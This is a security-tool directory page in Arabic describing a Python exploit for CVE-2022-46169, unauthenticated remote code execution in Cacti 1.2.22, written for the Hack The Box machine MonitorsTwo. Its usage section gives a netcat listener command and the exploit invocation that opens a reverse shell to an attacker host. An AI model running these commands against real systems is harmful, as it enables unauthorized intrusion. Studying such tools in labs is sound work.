Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-46169-Exploit — استغلال بايثون لـ CVE-2022-46169 ينفذ تنفيذ كود عن بعد غير مصادق عليه على Cacti إصدار 1.2.22 عبر شل عكسي، مخصص لاختبار الاختراق التعليمي. | Kitploit
أدوات/GitHubGitHub/0xzon/cve-2022-46169-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHub0xzon/cve-2022-46169-exploit

CVE-2022-46169-Exploit

استغلال بايثون لـ CVE-2022-46169 ينفذ تنفيذ كود عن بعد غير مصادق عليه على Cacti إصدار 1.2.22 عبر شل عكسي، مخصص لاختبار الاختراق التعليمي.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-46169 PoC - RCE غير مصادق عليه في Cacti 1.2.22

يحتوي هذا المستودع على استغلال لـ CVE-2022-46169، والذي يؤثر على Cacti 1.2.22. تسمح هذه الثغرة لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر.

إذا كنت تريد شرحاً مفصلاً لكيفية عمل هذا الاستغلال، فيرجى الرجوع إلى هذا المنشور من Rapid7. يقدمون تفاصيل كبيرة حول الخصوصيات.

لقد كتبت هذا الكود بمساعدة من chatGPT لجهاز Hack The Box يُدعى MonitorsTwo لأغراض تعليمية.

الاستخدام

root@kitploit:~
Arguments:
	-u URL of Cacti Application
	-lhost IP address of machine you want the shell on
	-lport Port of the machine you want the shell on

قم بإعداد مستمع على جهازك المحلي باستخدام netcat nc -lvnp 9001

شغل الاستغلال ضد الهدف python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001

إخلاء مسؤولية

هذا الدليل الإثباتي (PoC) مخصص فقط للأغراض التعليمية والاختبارية. استخدام هذا الدليل الإثباتي على أي نظام أو شبكة دون إذن صريح من مالك النظام غير قانوني وقد يؤدي إلى إجراءات قانونية. لا يتحمل المنشئ أي مسؤولية عن أي ضرر ناتج عن الاستخدام الصحيح أو غير الصحيح لهذا الدليل الإثباتي. استخدم على مسؤوليتك الخاصة.

المراجع

https://chat.openai.com/

https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/

تنزيل الأداة